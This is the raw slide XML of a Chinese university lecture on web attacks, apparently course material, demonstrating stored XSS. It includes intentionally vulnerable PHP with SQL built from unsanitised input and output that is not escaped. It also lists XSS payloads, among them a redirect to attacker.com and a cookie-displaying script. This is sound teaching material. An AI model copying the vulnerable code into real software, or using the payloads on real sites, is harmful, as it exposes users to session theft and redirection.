                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>杭州电子科技大学</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>陈黎丽</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="椭圆 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485169" y="3926627"/>
            <a:ext cx="1536171" cy="151670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glow rad="63500">
              <a:schemeClr val="accent1">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="149987" dist="250190" dir="8460000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="28000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="31750"/>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="obliqueBottomLeft"/>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1592349" y="1266719"/>
            <a:ext cx="8775510" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651727" y="2608956"/>
            <a:ext cx="0" cy="4104456"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">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1A19CDE-C705-90BA-0559-A5FC3D14DE00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8213502" y="5027833"/>
            <a:ext cx="6098146" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>104868116</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>chenlili@hdu.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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4688" t="39630" r="37812" b="49999"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2602230" y="1379350"/>
            <a:ext cx="4521200" cy="959042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="34687" t="52778" r="26250" b="37037"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364740" y="2935321"/>
            <a:ext cx="6731000" cy="987213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="35521" t="66330" r="25833" b="32222"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807211" y="4747832"/>
            <a:ext cx="10038576" cy="211625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="圆角矩形 8"/>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0" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="197866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数据流</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040370" y="1520825"/>
            <a:ext cx="1334770" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表单</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9375140" y="3199130"/>
            <a:ext cx="1381125" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018030" y="5053965"/>
            <a:ext cx="1323975" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7030085" y="5140325"/>
            <a:ext cx="1274445" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6894195" y="5101590"/>
            <a:ext cx="4249420" cy="387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72F00F59-28C5-00CF-1EAE-8B10F362B886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="24918"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC977188-51D1-FE7D-BE20-D34153BE48BB}"/>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5" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9CB48C-78AB-670E-2BE9-06D98E1BC0E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="197866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数据流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720" y="55245"/>
            <a:ext cx="4502150" cy="6369685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>//前端：2.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;head lang="en"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    &lt;meta charset="UTF-8"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    &lt;title&gt;存储型XSS&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    &lt;form action="action2.php" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        输入你的ID：  &lt;input type="text" name="id" /&gt; &lt;br/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        输入你的Name：&lt;input type="text" name="name" /&gt; &lt;br/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>        &lt;input type="submit" value="提交"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>    &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>//后端：action2.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$id=$_POST["id"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$name=$_POST["name"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	mysql_connect("localhost","root","root");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	mysql_select_db("test");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$sql="insert into xss value ($id,'$name')";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$result=mysql_query($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>//供其他用户访问页面：show2.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	mysql_connect("localhost","root","root");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	mysql_select_db("test");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$sql="select * from xss where id=1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	$result=mysql_query($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	while($row=mysql_fetch_array($result)){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>		echo $row['name'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771390" y="55245"/>
            <a:ext cx="6115050" cy="2038350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799965" y="3251200"/>
            <a:ext cx="4791075" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771390" y="2235835"/>
            <a:ext cx="4848225" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>在输入框中提交数据： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1   和 &lt;script&gt;alert(\'hack\')&lt;/script&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154805" y="5226050"/>
            <a:ext cx="3583305" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>数据流向：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前端--&gt;后端--&gt;数据库/文件/缓存--&gt;后端--&gt;前端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7952105" y="4194175"/>
            <a:ext cx="4039235" cy="2707640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2329180" y="55245"/>
            <a:ext cx="2218690" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储式XSS攻击示例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86585" y="1064895"/>
            <a:ext cx="8418830" cy="1938020"/>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重定向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;window.location.href=”http://attacker.com”;&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>弹出包含有浏览者cookie信息的对话框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;window.alert(document.cookie);&lt;/script&gt;</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648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存储型XSS攻击</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JS</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代码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="3746500"/>
            <a:ext cx="9970135" cy="678180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="3286125"/>
            <a:ext cx="9648190" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
